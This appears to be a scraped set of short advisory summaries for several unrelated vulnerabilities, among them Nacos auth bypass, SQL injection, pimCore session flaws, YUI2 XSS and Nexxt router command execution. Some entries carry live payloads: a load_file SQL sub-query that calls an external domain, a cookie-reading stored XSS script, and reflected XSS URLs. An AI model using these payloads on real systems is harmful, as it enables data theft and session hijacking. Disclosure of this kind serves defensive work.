A vulnerability in Nacos 2.0.3 allows an attacker to bypass authentication and authorization checks, allowing them to access the Nacos server without authentication. This is due to a flaw in the MyPyJWS class, which allows an attacker to craft a malicious JWT token that bypasses authentication and authorization checks. The attacker can then use this token to access the Nacos server.
Windows 11 Pro build 10.0.22000 Build 22000 suffers from Backup service - Privilege Escalation vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges and could delete data that could include data that results in the service being unavailable.
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.comquv'))+' was submitted in the User-Agent HTTP header. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The attacker can steal all information from this system and can seriously harm the users of this system, such as extracting bank accounts through which they pay each other, etc.
The pimCore-5.4.18-skeleton suffers from Sensitive Cookie with Improper SameSite Attribute vulnerability - PHPSESSID cookie Session management connection requests are not sanitizing correctly. There are no securing changes in PHPSESSID cookies for every request - validating sessions and changing a cookie for every connection - POST Request. The attacker in the same network can trick the user - the administrator of this system and can steal his cookie, then he can make very evil things by using the same session from the name of the already authenticated user - administrator, on a couple of PCs with different IPs which are used from different machines into that network. When the attacker steals the cookie, he can manipulate the same session, for example, he can log out or do very malicious stuff. This is a very stupid developer's error, and this can be very dangerous for the owner of the system. The attack is possible also in the external network!
This vulnerability does require authentication however, once the payload is stored, any user visiting the portal will trigger the alert. Login to the appplication, Browse to 'Settings' tab and then 'Wards'. Create a new word with the following payload at the ward name: <script>alert(document.cookie)</script> Any user browsing the application will trigger the payload.
NetIQ Performance Endpoint <=5.1 is vulnerable to a remote root/SYSTEM exploit. An attacker can send a malicious packet to the vulnerable system and execute arbitrary code with root/SYSTEM privileges.
YUI2 has a lot of reflected XSS vulnerabilities in pretty much most files. A sample of the vulnerable files along with the exploit can be found here: https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E, https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E, https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E, https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E, https://localhost/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E, https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E, https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E, https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
The AimOne Video Converter V2.04 Build 103 suffers from buffer overflow and local Denial of Service. The registration form is not working properly and crashes the video converter. When the attacker decides to register the product. This can allow him to easily crack the software and do more bad things it depending on the case.
This exploit allows an authenticated user to execute arbitrary code on the Nexxt Router Firmware 42.103.1.5095. The exploit is achieved by sending a malicious payload to the router's /goform/sysTools endpoint. The payload is sent using a POST request with the Authorization header set to the base64 encoded credentials of the user. The payload is sent as a parameter in the request body.
Bash commands can be run because double quotes are used to log incorrect entries to the system.
Services By CQR